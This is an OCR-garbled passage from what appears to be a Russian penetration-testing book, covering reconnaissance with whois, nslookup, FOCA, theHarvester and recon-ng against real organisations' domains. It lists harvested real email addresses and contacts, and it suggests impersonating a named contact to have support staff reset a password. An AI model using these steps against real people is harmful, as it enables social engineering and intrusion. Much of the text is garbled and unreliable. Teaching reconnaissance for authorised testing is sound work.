рпізпіпд ыіе нееа 
НозИпд РМзЫпд АІеПз 
5ЯІ СА РМіяИіпд АІеПз 
Ргоіесііоп Тог ТЮз адаіпзі 
РЫяПіпд япгі МаЬѵагр 
ГЭесерІіѵе Пптяіп Ясоге 
Вапк Ргаигі Оеіесііоп 
РРівТііпд 5і1ѳ Соипіѳгтѳагигѳз 


Ехіопзіоп 5иррогТ 


Ьоокир апоіПег 1Ж1. 


зпаге: ОООФв© 


Епісг а ШІ. Неге 
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асМге.зз 

ЛГоГРгезелТ 

Пеѵегзе 

гшя 

ипкпоѵѵп 

Эотаіп 

гедізігаг 

азсю.сот 

Иатезеп/ег 

огдапфаііоп 

ѵ/Поіз.азсіо.сот 
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юпйоп, юпаоп, ЕС4У 
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В Нозііпд Нізіогу 


иенмоск оѵѵпег 

іРаоогезз 

05 

ѵѵеозегѵег 

изізееп тнияь 

ЯоуаІ МаіІ Сгоир 

77.95.81.226 

Сіосо 

ипкпоѵѵп 

28 Лип 2016 
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Рис. 2 . 7 . Информация о сайте гоуаітаіі.сот 

Получение информации о домене 

Одним из самых удобных способов получения информации о домене является ис¬ 
пользование утилиты \ѵЬоі§, которая доступна в различных дистрибутивах Ьіпих, 
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включая Каіі. Среди прочих данных, полученных этим путем, мы можем найти 
контактную информацию, регистратора, контактное лицо по вопросам техниче¬ 
ского характера, адреса серверов и многое другое. 

Посмотрим, к примеру, какую информацию мы можем получить о домене апи. 
есіи.аи: 


гооі:@ка1і :~# мМоіз апи. есіи.аи 
Ротаіп Цате: 

ЬазТ Мосіі-Ріесі: 

БІаіиз : 

Ке§і5ігаг Цате: 

Ке§і5ігапі: : 

Е1і§іЬі1і1;у Туре: 


апи. есіи.аи 

09-1ип-2016 00:38:02 ЦТС 
ок 

Есіисаііоп Бегѵісе Аизігаііа ШсІ 

Аизігаііап Маііопаі ІІпіѵегзіТу 
Ні§Нег Есіисаііоп Іпзіііиііоп 


Ке§І5І:гапі: СопІасІ Ю: ЕРІІ1913-К 

Ке§і5І:гапі: СопЕасТ Цате: Куііе Раіпіаіп 

Ке§і5ігапі: Сопіасі: Етаіі: Ѵізіі міюіг. аи5ге§і5І:гу. сот.аи Тог ІдІеЬ ЬазесІ ІліИоІз 


Тесіі СопТасТ Ю: 
Тесіі СопТасТ Цате: 
Тесіі СопТасТ Етаіі: 


ЕРІ19942-С 
Куііе Раіпіаіп 

ѴІ5ІТ МІ10І5.аи5пе§і5І:пу.сот.аи Тог ІлІеЬ Ьазесі ІліТіоІз 


ІМате Бегѵег: 
ІМате Бегѵег ІР: 
ІМате Бегѵег: 
ІМате Бегѵег ІР: 
ІМате Бегѵег: 
ІМате Бегѵег ІР: 
РЦББЕС: 


П5. асіеіаісіе. есіи. аи 

129.127.40.3 

П5І.апи.есіи.аи 

150.203.1.10 

ипа .апи. есіи. аи 

150.203.22.28 

ип5і§песі 


Итак, теперь у нас есть контактная, а также некоторая техническая информация, 
относящаяся к данному домену. Мы можем применить ее, используя пресловутую 
социальную инженерию, упомянутую выше. Например, позвонить в службу тех¬ 
нической поддержки, представиться Кайли и попросить сбросить пароль, ссылаясь 
на то, что он был забыт. 

Используя утилиту пзіоокир, которая есть как под ѴѴіікіоѵѵб, так и под Іл шх, мы по¬ 
лучили информацию о том, какой ІР-адрес используется для страницы опз.§сѵ.и к: 

гооі@ка1і :~# п$1оокир апи. есіи.аи 
Бегѵег : 

Асісігезз : 

І\Іоп-аи1:ііогі1:а1:іѵе апзмег: 

ІМате: апи.есіи.аи 

Асісігезз: 130.56.60.81 


192.168.126.2 

192.168.126.2#53 


Утилита \ѵЬоІ8 может работать не только с доменными именами, но и с ІР-адресами, 
а это значит, что мы легко можем выполнить обратный запрос. 
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гооТ@ка1і:~# мИоіз 130.56.60.81 
# 

# АКЮ ІЛІН0І5 НаТа апсі зегѵісез аге зиЬ]'есТ То ТНе Тегтз оР ІІзе 

# аѵаіІаЬІе аТ: НТТрз: //мим. агіп.пеТ/иНоіз_Тои.НТтІ 

# 

# ІР уои зее іпассигасіез іп ТНе гезиІТз, ріеазе герогТ аТ 

# НТТрз: // мим. агіп.пеТ/риЫіс/мНоізіпассигасу/іпсІех.хНТтІ 

# 


# 

# ТНе Ро11оніп§ гезиІТз тау аізо Ье оЬТаіпес) ѵіа: 

# НТТрз: //мИоіз. агіп. пеТ/гезТ/пеТз;л=130.56.60.81?зНонВеТаіІ5=Тгие&5НоиАКІМ=РаІ5е&5 
НомМопАгіпТорЕеѵе1МеТ=Ра1зе&ехТ=пеТгеР2 

# 


МеТКап§е: 

СЮК : 

МеТМате: 
ІМеТНапсіІе: 
РагепТ : 
МеТТуре: 
0гі§іпА5: 
Ог§апігаТіоп: 
Ке§РаТе: 
ІІрсІаТесі: 
СоттепТ : 
СоттепТ: 
СоттепТ: 
СоттепТ : 
СоттепТ: 
СоттепТ: 
СоттепТ: 
СоттепТ: 
СоттепТ: 
СоттепТ: 
СоттепТ: 
апсІ-5раттіп§ 
КеР: 


130.56.0.0 - 130.56.255.255 

130.56.0.0/16 

АРІЧІС-ЕКХ-130-56-0-0 

ИЕТ-130-56-0-0-1 

ИЕТ130 (МЕТ-130-0-0-0-0) 

Еагіу Ке§ізТгаТіопз, ТгапзРеггесІ То АРМІЮ 

Азіа РасіРіс МеТмогк ІпРогтаТіоп СепТге (АРМІС) 

2003-11-12 

2009-10-08 

ТИіз ІР асісігезз гап§е із пот ге§ізТегесі іп ТНе АКЮ ИаТаЬазе. 

ТИіз гап§е маз Тгапз-РеггесІ То ТНе АРИЮ ІдІНоіз ОаТаЬазе аз 
рагТ оР ТНе ЕКХ (Еагіу Ке§ізТгаТіоп ТгапзРег) рго^есТ. 

Рог сІеТаіІз, геТег То ТНе АРМІС ІдІНоіз РаТаЬазе ѵіа 
ИН0І5. АРМІС. ІМЕТ ог ИТТр: //щ . арпіс. пеТ/арпіс-Ьіп/мНоіз. рі 

** ІМРОКТАМТ МОТЕ: АРИЮ із ТНе Ке§іопа1 ІпТегпеТ Ке§ізТгу 
■Рог ТИе Азіа РасіРіс ге§іоп. АРМІС сіоез пот орегаТе пеТмогкз 
изіп§ ТИіз ІР асІНгезз гап§е апсі із пот аЫе То іпѵезТі§аТе 
зраш ог аЬизе герогТз ге1аТіп§ То ТИезе асісігеззез. Рог тоге 
Неір, геРег То ИТТр://мми.арпіс.пеТ/арпіс-іпРо/мНоіз_зеагсН2/аЬизе- 

ИТТрз://мИоіз.агіп.пеТ/гезТ/пеТ/МЕТ-130-56-0-0-1 


КезоигсеЕіпк: ИТТр: //щ .арпіс. пеТ/мИоіз-зеагсИ/5ТаТіс/5еагсИ. НТтІ 
КезоигсеЕіпк: мИоіз.арпіс. пет 


Откате : 
Ог§ІсІ: 
АсІИгезз: 
СіТу: 

ЗТаТеРгоѵ: 
РозТаІСосІе: 
СоипТгу: 
Ке§РаТе: 
ЕІрсІаТесі: 
КеР: 


Азіа РасіРіс МеТмогк ІпРогтаТіоп СепТге 
АРМІС 

РО Вох 3646 

5оиТН ВгізЬапе 

ОЮ 

4101 

АЕІ 

2012-01-24 

ИТТрз://мИоіз.агіп.пеТ/гезТ/ог§/АРМІС 


КеРегга15егѵег: мИоіз://мИоіз.арпіс. пет 

КезоигсеЕіпк: ИТТр ://ѵщ .арпіс.пеТ/мИоіз-зеагсИ/зТаТіс/зеагсИ.НТтІ 
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0г§АЬизеНапсЛе : 
0г§АЬизеМате : 
0г§АЬизеРИопе : 
0г§АЬизеЕтаі1 : 
0г§АЬизеКеР : 


АІЛІС12-АКІЦ 

АРNIС ЫМоіз Сопіасі 

+61 7 3858 3188 

зеагсМ-арпіс-поі-агіп@арпіс . пеі 

Міірз://мМоіз. агіп. пеі/гезі/рос/АЫС12-АК^ 


0г§ТесННап<і1е: 
Ог§ТесНМате: 
Ог§ТесНРІіопе: 
0г§ТесНЕтаі1: 
Ог§ТесНКеР: 


АЫС12-АКІМ 

АРМІС ІлІМоіз Сопіасі 

+61 7 3858 3188 

зеагсМ-арпіс-поі-агіп@арпіс. пеі 

ІтИрз: //мНоіз. агіп. пеі/гезі/рос/АІлІС12-АКІМ 


# 

# АКШ ЫН0І5 сіаіа апсі зегѵісез аге зиЬэесі іо іМе Тегтз о-р ІІзе 

# аѵаіІаЬІе аі: Міірз://ммм.агіп.пеі/мМоіз_іои.Міті 

# 

# ІР уои зее іпассигасіез іп іМе гезиііз, ріеазе герогі аі 

# Міірз://ммм.агіп.пеі/риЫіс/мМоізіпассигасу/іпсІех.хМітІ 

# 

Еоипсі а пеРеггаІ іо мМоіз.арпіс.пеі. 

% [мРіоіз.арпіс.пеі] 

% ІлІМоіз сіаіа соругі@Мі іегтз Міір://ммм.арпіс.пеі/сІЬ/сІЬсоругі§Мі. Міті 
% Іпіогтаііоп пеіаіесі іо '130.56.0.0 - 130.56.255.255' 


іпеіпит: 
пеіпате: 
сіезсг: 
соипігу: 
асітіп-с: 
іесМ-с: 
зіаіиз: 
гетагкз: 
гетагкз: 
гетагкз: 
гетагкз: 
гетагкз: 
поіііу: 
тпі-Ьу: 
сМап§ес): 
сМап§есі: 
сМап§есі: 
сИап§есІ: 
сЬап§есІ: 
сМап§ес): 
зоигсе : 


130.56.0.0 - 130.56.255.255 
АРИМЕТ 

ітрогіесі іпеіпит оЬ^'есі Рог АN^ 
АЦ 

АН248-АР 

АН248-АР 

АИОСАТЕР РОКТАВІЕ 


ГѲѴ-ЗГѴ N51. АШ. ЕОІІ. АІІ 

ША.АМІІ. ЕОІІ. АІІ 
N5. АОЕЕАЮЕ . ЕОІІ .АІІ 


Мозітазіег@апи.есІи.аи 

АРМІС-НМ 

Мозітазіег@агіп.пеі 20030530 
Мт-сМап§есі@арпіс. пеі 20040926 
Мт-сМап§есі@арпіс. пеі 20031020 
Мт-сМап§есі@арпіс. пеі 20031219 
Ріозітазіег@апи.есІи.аи 20040106 
Мт-сМап§есі@арпіс.пеі 20041214 
АРNIС 


гоіе: 
асісігезз: 
асісігезз: 
соипігу: 
рМопе: 
Рах-по: 


АN^ Мозітазіег 

115, Аизігаііап Nаііопа1 ІІпіѵегзііу 
СапЬегга АСТ 0200 Аизігаііа 
АЦ 

+61-2-6125-3264 

+61-2-6125-8199 
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е-таіі : 
гетагкз: 
гетагкз: 
гетагка: 
асітіп-с : 
ТесН-с: 
піс-ЕісІІ : 
гетагкз: 
поТіТу : 
тпТ-Ьу: 
с(іап§есі : 
зоигсе: 
с(іап@есі : 


Іі05І:та5І:ег@апи.есІи . а и 

зѳпсі аЬизе герогТз То аЬизе@апи.ес1и.аи 

Ріеазе іпсіисіе сіеѣаііесі іп-РогтаТіоп апсі 

Тітез іп ІІТС 

СН176-АР 

СН176-АР 

АМ248-АР 

№1р://мыы.апи.есІи.аи 
Іі05І:та5І:ег@апи.есІи. а и 
МАІІЧТ-АІІ-АМи 

Іі05І:та5І:ег@апи.есІи.аи 20030411 
АРЫІС 

Ит-сРіап§есІ@арпіс. пеТ 20111114 


% ТІГІ5 риегу мах зегѵесі Ьу ТНе АРІМІС ИРюіз Бегѵісе ѵегзіоп 1.69.1-АРМІСѵ1г0 
(ІІШЕЕІМЕО) 

Теперь мы получили не только контактную информацию, но и диапазон ІР-адресов, 
используемых данной организацией. Это может стать входной точкой для следу¬ 
ющего шага. Нам уже известно, какие адреса необходимо сканировать, что суще¬ 
ственно ускорит поиск уязвимостей и облегчит нашу задачу. 

Ниже приведены адреса еще нескольких ресурсов, предоставляющих подобный 
сервис: 

□ Кіре.пеі ; 

□ Ішр://ѵоѵош.пеі№огк8о1иііот.сот/ткоі5/іп(1ех.і8р', 

□ кіір://т)ші!.ткоІ8.8с/; 

□ ріп§.еи ; 

□ іюхюхюАотаіпіооЬ.сот. 


Автоматизация процесса 


Согласитесь, что просматривать и вручную обрабатывать всю найденную информа¬ 
цию может быть достаточно сложно, особенно если вы тестируете сеть достаточно 
большой организации. В этом разделе мы рассмотрим несколько полезных про¬ 
грамм и сервисов, которые помогут автоматизировать данный процесс. 


РОСА 

Эта многофункциональная бесплатная утилита для \УіпсІо\ѵ5 позволяет решать 
достаточно широкий круг задач, например: 
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□ поиск поддоменов для заданного домена; 

□ перебор записей для ПК 8-сервера; 

□ получение всех записей ОКЗ-сервера; 

□ поиск других веб-сервисов, которые работают на том же ІР-адресе; 

□ поиск файлов и извлечение метаданных. 

В данном разделе нас интересует как раз последняя возможность. Посмотрим, что 
мы можем получить, проанализировав документы, найденные на піс.ги. 



Рис. 2.8. Пример работы РОСА 


Затем скачаем их, используя интерфейс той же программы. Для этого достаточно 
щелкнуть правой кнопкой мышки по любому из найденных документов и выбрать 
опцию Ооѵѵпіоасі аІІ. 

Далее проанализируем данные, используя функцию ЕхСгасІ АІІ ИеСасІаІа. Теперь мы 
можем увидеть системные имена пользователей, которые создали данный документ, 
а также версию программы, операционную систему и многое другое. 
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Рис. 2.9. Список имен пользователей 

Сбор базы данных адресов е-таіі 

Для автоматизации сбора базы данных адресов е-таіі для конкретного домена была 
создана одна хорошая утилита — §оо§1е-таі1. Она написана на языке программи¬ 
рования РуіІіоп и входит в состав Ьіпих- дистрибутива Каіі. Эта сборка Ьіпих была 
создана специально для профессионалов, занимающихся вопросами информаци¬ 
онной безопасности, и содержит много полезных утилит для аудита ИС. Мы еще 
не раз будем ссылаться на ПО, которое содержится в данной ОС. 

А теперь продемонстрируем ее работу — попробуем найти адреса почтовых ящиков, 
которые принадлежат статистической службе Великобритании: 

гоо1:@ка1і:~# ТЬеЬагѵезІіег -сі оп5.§оѵ.ик -Ь @оо§1е 

[-] 5еагсНіп§ іп Соо§1е: 

5еагсМіп§ в гезіЛГз... 

5еагсМіп§ 100 гезиііз... 

[+] Етаііз Гоипсі: 

N655. ігѵРо@оп5. §оѵ. ик 
ті§5І:а-1:5ипі1:@0П5 .§оѵ. ик 
РТМ. сараЫ1і1:у@оп5. §оѵ. и к 
сІаззіГісаТіопз. Не1рсІе5к@оп5 .§оѵ. ик 
соттеп1;5@оп5.§оѵ.ик 
ЬеГТег . ігтРо@оп5. §оѵ. ик 
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1аЬоиг.тагке-1;@оп5.§оѵ.ик 
ті1е5@оп$.§оѵ.ик 
паТіопа1ие11-Ьеіп§@оп5.§оѵ.ик 
ИомагсІ. те11;2ег@оп5. §оѵ. ик 
ериа1і1:іе5апсіие11Ьеіп§@оп5. §оѵ. ик 
раиі.].заскзоп@оп5.§оѵ.ик 

[+] Н 05 Т 5 ТоипсІ іп зеагсИ еп§іпе5: 


[-] Кезо1ѵіп§ Іі05І;пате5 ІР5... 

46.137.157.118:51:у1е.оп5.@оѵ.ик 
52.48.12.36: сопаиИаНопз . ОП5. §оѵ. и к 
192.0.78.13:сІі§і1:а1риЫІ5Міп§.оп5.§оѵ.ик 
54.192.203.35:регТогтапсе.опг.§оѵ.и к 
46.137.157.118:зѣуіе.опз.@оѵ.ик 
46.137.157.118:ѵізиаі.ОП5.§оѵ.ик 
104.20.61.76: мим .ОП5.§оѵ.и к 

Чем это может быть полезно? Тем, что, узнав почтовые адреса, мы можем заняться 
социальной инженерией. 

Проведя несколько минут в вышеупомянутой поисковой системе, мы обнаружили, 
что Раиі 1 Даскзоп использует свой е-таіі в личных целях — например, оставляет 
комментарии на ата/оп.сопі. 



Рис. 2.10. Комментарии к продукту на атагоп.сот от Раиі ^ ^скзоп 
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Известен случай, когда хакер выяснил, что один из сотрудников компании занима¬ 
ется коллекционированием значков. Он ответил на размещенное этим человеком 
объявление и сообщил, что у него есть именно те коллекционные экземпляры, 
которые тот ищет. Затем он дал ему ссылку на страничку, где можно посмотреть 
всю коллекцию и выбрать интересующие значки. Конечно же, страничка была 
создана хакером заранее и содержала вирус, который заразил компьютер данного 
сотрудника и позволил хакеру получить доступ к его данным. 

гесоп-пд 

В состав Каіі Ьіпих входит одно очень интересное и нужное ПО — гесоп-п§. Это 
написанный на РуіЬоп фреймворк, который поможет автоматизировать сбор ин¬ 
формации из сети Интернет. 

Данный фреймворк содержит множество подключаемых модулей, с которыми мы 
рекомендуем ознакомиться подробнее. 

Данная программа состоит из подключаемых модулей, и команда зЬо\ѵ щобиіез 
покажет нам их все. 

гоо1:@ка1і:~# гесоп-п§ 

76] Кесоп тосіи1е5 
[7] Керог1:іп@ тосіиіез 
[2] Ітрогі: тосіиіез 
[2] Ехріоііаііоп тосіиіез 
[2] Оізсоѵегу тосіиіез 

[гесоп-п§] [сіеіаиіі] > зНом тосіиіез 

Оізсоѵегу 


сИзсоѵегу/ігѵРо_сІІ5с105иге/сасНе_5поор 

(И5соѵегу/ігѵРо_сІІ5с105иге/іп1:еге5І:іп@_Рі1е5 

Ехріоііаііоп 


ехр1оіІаііоп/іп]'есІіоп/соттап<1_іп з'есіог 
ехріоііаііоп/іп ]'есІіоп/храІ1і_Ьгиіег 

Ітрогі; 


ітрогі/сзѴ-ГіІе 

ітрогі/іізі 

Кесоп 


гесоп/сотрапіез-сопІасІз/Ьіп§_1іпкесІіп_сас1іе 

гесоп/сотрапіез-сопіасіз/іпсіеесі 

гесоп/сотрапіез-сопІасі5/]і@5аи/роіпІ_и5а§е 

гесоп/сотрапіез-сопІасіз/]і@5аи/ригс1іа5е_сопіасі 
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гесоп/сотрапіе5-соп1:ас1:5/]і§$аи/5еагсН_соп1:ас1:$ 

гесоп/сотрапіе5-соп1;ас1:5/1іпкесііп_аи1:Іі 

гесоп/сотрапіе5-ти1Ті/§і1:ІіиЬ_тіпег 

гесоп/сотрапіе5-ти11:і/мІіоі5_тіпег 

гесоп/сопТасТз-сопТасТз/таИТегТег 

гесоп/соп1;ас1;5-соп1;ас(;5/тап§1е 

гесоп/соп1;ас1;5-соп1;ас(;5/иптап§1е 

гесоп/соп1;ас1;5-сгесіеп1;іаІ5/МіЬр_ЬгеасИ 

гесоп/соп1;ас(;5-сгесіеп1;іаІ5/МіЬр_ра5-1;е 

гесоп/соп1;ас1:5-сІотаіп5/ті§га1;е_соіт(;ас1:5 

гесоп/сопТасТз-ргоТПез/ТиПсопТасТ 

гесоп/сгесІеп1:іаІ5-сгесіеп1:іаІ5/асІоЬе 

гесоп/сгесІеп1:іаІ5-сгесІеп1:іаІ5/Ьогосгаск 

гесоп/сгесІеп1:іаІ5-сгесіеп1:іаІ5/На5Ме5_ог§ 

гесоп/сіотаіпз-сопііасііх/теііасгаміег 

гесоп/сІотаіп5-соп-1;ас1;5/р§р_5еагсИ 

гесоп/сІотаіп5-соп1;ас1;5/мМоі5_рос5 

гесоп/Цотаіп5-сгеЦепѣіаІ5/рмпесі1і5І:/ассоип-(:_сгесІ5 

гесоп/сІотаіп5-сгесіеп1;іаІ5/рмпесі1і5І;/арі_и5а§е 

гесоп/сІотаіп5-сгесіеп1;іаІ5/рмпесі1і5І;/сІотаіп_сгесІ5 

гесоп/сІотаіп5-сгесіеп1;іаІ5/рмпесі1і5І:/сІотаіп_і5р^песІ 

гесоп/сІотаіп5-сгесіеп1;іаІ5/рмпесі1і5І;/1еак_1оокир 

гесоп/сІотаіп5-сгесіеп1;іаІ5/рмпесі1і5І;/1еак5_сІитр 

гесоп/сІотаіп5-сІотаіп5/Ьги1;е_5и-( : -( : іх 

гесоп/сІотаіп5-Ио5І;5/Ьіп§_с1отаіп_арі 

гесоп/сІотаіп5-Ио5І;5/Ьіп§_гіотаіп_меЬ 

гесоп/сІотаіп5-Ио5І;5/Ьги-1;е_Ііо5І;5 

гесоп/Цотаіп5-Но5І5/Ьиі11:іліі-|:Іі 

гесоп/сІотаіп5-Ио5І;5/§оо§1е_5і-1;е_арі 

гесоп/сІотаіп5-Ио5І;5/§оо§1е_5і1;е_меЬ 

гесоп/сІотаіп5-Ио5І;5/Иаскег1;аг§е1: 

гесоп/сІотаіп5-Ио5І;5/пе1;сга-р-(; 

гесоп/сІотаіп5-Ио5І;5/5Мосіап_Мо5І;пате 

гесоп/сІотаіп5-Ио5І;5/5 2І_5ап 

гесоп/сІотаіп5-Ио5І;5/1;Мгеа1:сгомсІ 

гесоп/сІотаіп5-Ио5І;5/ѵрпІіип1;ег 

гесоп/Цотаіп5-ѵи1пегаЬі1і1:іе5/§МЬ 

гесоп/сІотаіпз-ѵиІпегаЬіІіІііез/рипкзрісІег 

гесоп/сІотаіпз-ѵиІпегаЬіІіІііез/хззесІ 

гесоп/сІотаіпз-ѵиІпегаЬіІіІііез/хззрозесІ 

гесоп/Мо5І;5-сІотаіп5/ті§га1:е_Ііо5І:5 

гесоп/Мо5І;5-Мо5-(;5/Ьіп§_ір 

гесоп/Мо5І;5-Мо5І;5/-Ргее§еоір 

гесоп/МозТз-Мозѣз/іріпТосіЬ 

гесоп/МозТз-МозТз/гезоІѵе 

гесоп/Мо5І;5-Мо2-(;5/геѵег5е_ге501ѵе 

гесоп/МозТз-МозТз/БЗІІіооІз 

гесоп/Но5ѣ5-1оса1:іоп5/ті§га-|:е_Но2І:5 

гесоп/Мо5І;5-рог1;5/5кіосіап_ір 

гесоп/1оса1:іоп5-1оса-1;іоп5/§еососІе 

гесоп/1оса1:іоп5-1оса-1;іоп5/геѵег5е_§еососіе 

гесоп/1оса1:іоп5-ри5кіріп5/-Р1іскг 

гесоп/1оса1;іоп5-ри5кіріп5/іп5І;а§гат 

гесоп/ІосаТіопз-ризИріпз/рісаза 

гесоп/1оса1;іоп5-ри5кіріп5/5ІіосІап 
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гесоп/ІосаСіопа-риаНріпа/СміСТег 

гесоп/ІосаСіопа-риаНріпа/уоиСиЬе 

гесоп/пеТЫоска-сотрапіеа/мНоіа_ог§а 

гесоп/пеТЫоска-НоаСа/геѵегае_геао1ѵе 

гесоп/пеТЫоска-НоаСа/аНосІап_пеС 

гесоп/пеТЫоска-рогСа/сепаиа_2012 

гесоп/пеТЬІоска-рогГа/сепауаіо 

гесоп/рогТа-НоаТа/ті§гаТе_рогТа 

гесоп/ргоТі1еа-сопТасТа/сІеѵ_сІіѵег 

гесоп/ргоТі1еа-сопТасТа/§іТНиЬ_иаега 

гесоп/ргоТіІеа-ргоТіІеа/патесНк 

гесоп/ргоТіІеа-ргоТіІеа/ргоТіІег 

гесоп/ргоТіІеа-ргоТіІеа/ТміТСег 

гесоп/ргоТі1еа-героаіТогіеа/§іТНиЬ_героа 

гесоп/героаіТогіеа-ргоТі1еа/§іТНиЬ_соттіСа 

гесоп/героаіТогіеа-ѵи1пегаЬі1іТіеа/ёіаТа_аеагсН 

гесоп/героаіТогіеа-ѵи1пегаЬі1іТіеа/ёіСНиЬ_сІогка 

КерогТіп§ 


герогТіп§/саѵ 

герогТіп§/НТт1 

герог1;іп§/]50п 

герогТіп§/1іаС 

герогТіп§/риаНріп 

герогТіп§/х1ах 

герогТіп§/хт1 

Теперь с помощью гесоп-п§ мы найдем поддомены, которые используются ата/оп. 
сот. Загрузим нужный модуль «Іоай §оо§1е_зі1;е_\ѵеЪ», посмотрим на его параметры 
«зеі», зададим нужные «зеі; зоигсе атагоп.сот» и запустим его командой «тип». 

[гесоп-п§] [сІеТаиІТ] > Іоасі §оо§1е_аіТе_меЬ 
гесоп-п§] [сІе-РаиІТ:] [@оо§1е_аіТе_меЬ] > аеТ 
ЗеТа тосіиіе орТіопа 

11аа§е: аеТ <орТіоп> <ѵа1ие> 

Мате СиггепТ Ѵаіие КечиігесІ ОеасгірТіоп 


501ІКСЕ сІеТаиІТ уеа аоигсе оТ іприТ (аее ' аНом іп-Ро’ Тог сІеСаіІа) 

[гесоп-п§] [сІеТаиІТ] [§оо§1е_аіСе_і«іеЬ] > аеТ аоигсе атагоп.сот 
501ІКСЕ => атагоп.сот 

[гесоп-п§] [сІеТаиІТ] [§оо§1е_аіСе_і«іеЬ] > гип 


АМА20М. СОМ 


[*] 5еагсНіп§ Соо§1е Тог: аіТе: атагоп . сот 
[*] [ИоаТ] аиТНогсепТгаІ.атагоп. сот (<Ыапк>) 
[*] [ИоаТ] ама.атагоп. сот (<Ыапк>) 

[*] [ИоаТ] мНіарегсааТ.атагоп. сот (<Ыапк>) 
[*] [ИоаТ] ими. атагоп.сот (<Ыапк>) 

[*] [ИоаТ] аТогумгіТег .атагоп.сот (<Ыапк>) 
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[*] [ И05І: ] аТТіііаТе-Ыо§. атагоп.сот (<Ыапк>) 

[*] [ И05І; ] раутепТз-сІе .атагоп.сот (<Ыапк>) 

[*] [ И05І; ] раутепТз.атагоп.сот (<Ыапк>) 

[*] [ И05І: ] ксір. атагоп.сот (<Ыапк>) 

[*] [ И05І: ] асІѵегТІ5іп§. атагоп.сот (<Ыапк>) 

[*] [ И05І; ] зегѵісез .атагоп.сот (<Ыапк>) 

[*] [ И05І; ] ѵепсіогехргезз. атагоп.сот (<Ыапк>) 

[*] [ И05І; ] зТисІіоз. атагоп.сот (<Ыапк>) 

[*] [ІіозТ] сіеѵеіорег. атагоп.сот (<Ыапк>) 

[*] [ІіозТ] ѵісіеосіігесТ . атагоп. сот (<Ыапк>) 

[*] 5еагсНіп§ боо§1е Тог: зіТе: атагоп.сот -зіТе : аиТНогсепТгаі .атагоп.сот -зіТе:амз. 
атагоп.сот -зіТе:іліНІ5регсазТ .атагоп.сот -зіТе :ммм.атагоп.сот -зіТе:зТогумгіТег. 
атагоп. сот -5ІТе : аТТі1іаТе-Ь1о§. атагоп .сот -5ІТе : раутепТз -сіе. атагоп. сот 
-зіТе :раутепТз.атагоп.сот -зіТе :кф. атагоп. сот -зіТе : асІѵегТІ5іп§. атагоп.сот 
-зіТе : зегѵісез . атагоп. сот -зіТе : ѵепсіогехргезз .атагоп. сот -зіТе : зТисІіоз . атагоп. сот 
-зіТе : сіеѵеіорег .атагоп. сот -зіТе : ѵісіеосіігесі: . атагоп. сот 
[*] [ІіозТ] аТТіііаТе-рго§гат. атагоп.сот (<Ыапк>) 

[*] [ІіозТ] зеііегсепТгаі-еигоре .атагоп.сот (<Ыапк>) 

[*] [ІіозТ] иесіаТа. атагоп. сот (<Ыапк>) 

[*] [ІіозТ] ТміТсІі. атагоп. сот (<Ыапк>) 

[*] [ІіозТ] раутепТз-сІе-запсІЬох. атагоп.сот (<Ыапк>) 

[*] [ІіозТ] кіпсПезсоиТ . атагоп. сот (<Ыапк>) 

[*] 5еагсИіп§ Соо§1е Тог: зііе:атагоп.сот -зіТе : аиТНогсепТгаі .атагоп.сот -зіТе:амз. 
атагоп.сот -зіТе імІіізрегсазТ . атагоп. сот -зіТе :ммм.атагоп.сот -зіТе:зТогумгіТеп. 
атагоп. сот -зіТе : аТТіііаТе-Ыо§. атагоп .сот -зіТе : раутепТз -сіе. атагоп. сот 
-зіТе: раутепТз.атагоп.сот -зіТе : ксір .атагоп.сот -зіТе : асІѵегТІ5іп§. атагоп.сот 
-зіТе : зегѵісез . атагоп. сот -зіТе : ѵепсіогехргезз .атагоп. сот -зіТе : зТисІіоз . атагоп. 
сот -зіТе : сіеѵеіорег. атагоп.сот -зіТе:ѵісіеосіігесі:. атагоп.сот -зіТе : аТТіііаТе- 
рго§гат. атагоп .сот -зіТе : зеііегсепТгаі- ей горе, атагоп. сот -зіТе: иесіаТа . атагоп. сот 
-зіТе:ТміТсІі .атагоп. сот -зіТе: раутепТз-сІе-запсІЬох. атагоп .сот -зіТе : кіпсііезсоиі:. 
атагоп.сот 

[*] [ІіозТ] тизіс .атагоп.сот (<Ыапк>) 

[*] 5еагсИіп§ Соо§1е Тог: зіТе: атагоп.сот -зіТе : аиТНогсепТгаі .атагоп.сот -зіТе:амз. 
атагоп.сот -зіТе:мНізрегсазТ .атагоп.сот -зіТе :мі«м. атагоп. сот -зіТе:зТогумгіТег. 
атагоп. сот -зіТе : аТТіііаТе-Ыо§. атагоп .сот -зіТе : раутепТз -сіе. атагоп. сот 
-зіТе: раутепТз.атагоп.сот -зіТе : ксір. атагоп.сот -зіТе : асІѵегТІ5іп§. атагоп.сот 
-зіТе : зегѵісез . атагоп. сот -зіТе : ѵепсіогехргезз .атагоп. сот -зіТе : зТисІіоз . атагоп. 
сот -зіТе : сіеѵеіорег. атагоп.сот -зіТе:ѵісіеосіігесі:. атагоп.сот -зіТе : аТТіііаТе- 
рго§гат. атагоп .сот -зіТе : зеііегсепТгаі -ей горе, атагоп. сот -зіТе: иесіаТа . атагоп. сот 
-зіТе:ТміТсН .атагоп. сот -зіТе: раутепТз- сіе-запсІЬох. атагоп .сот -зіТе : кіпсііезсоиі:. 
атагоп.сот -зіТе:тизіс .атагоп.сот 
[*] [НозТ] зтііе .атагоп.сот (<Ыапк>) 

[*] 5еагсНіп§ Соо§1е Тог: зіТе: атагоп.сот -зіТе : аиТНогсепТгаі .атагоп.сот -зіТе:амз. 
атагоп.сот -зіТе:мНізрегсазТ .атагоп.сот -зіТе :ммл/. атагоп. сот -зіТе:зТогумгіТег. 
атагоп. сот -зіТе : аТТі1іаТе-Ь1о§. атагоп .сот -зіТе : раутепТз -сіе. атагоп. сот 
-зіТе: раутепТз.атагоп.сот -зіТе : ксір. атагоп.сот -зіТе : асІѵегТІ5іп§. атагоп.сот 
-зіТе : зегѵісез . атагоп. сот -зіТе : ѵепсіогехргезз .атагоп. сот -зіТе : зТисІіоз . атагоп. 
сот -зіТе : сіеѵеіорег. атагоп.сот -зіТе:ѵісіеосіігесі:. атагоп.сот -зіТе : аТТіііаТе- 
рго§гат. атагоп .сот -зіТе : зеііегсепТгаі -ей горе, атагоп. сот -зіТе: иесІаТа . атагоп. сот 
-зіТе:ТміТсН .атагоп. сот -зіТе: раутепТз- сіе-запсІЬох. атагоп .сот -зіТе : кіпсІІезсоиТ. 
атагоп.сот -зіТе:тизіс .атагоп.сот -зіТе:зті1е. атагоп.сот 
[*] [ІіозТ] зеііегсепТгаі .атагоп.сот (<Ыапк>) 

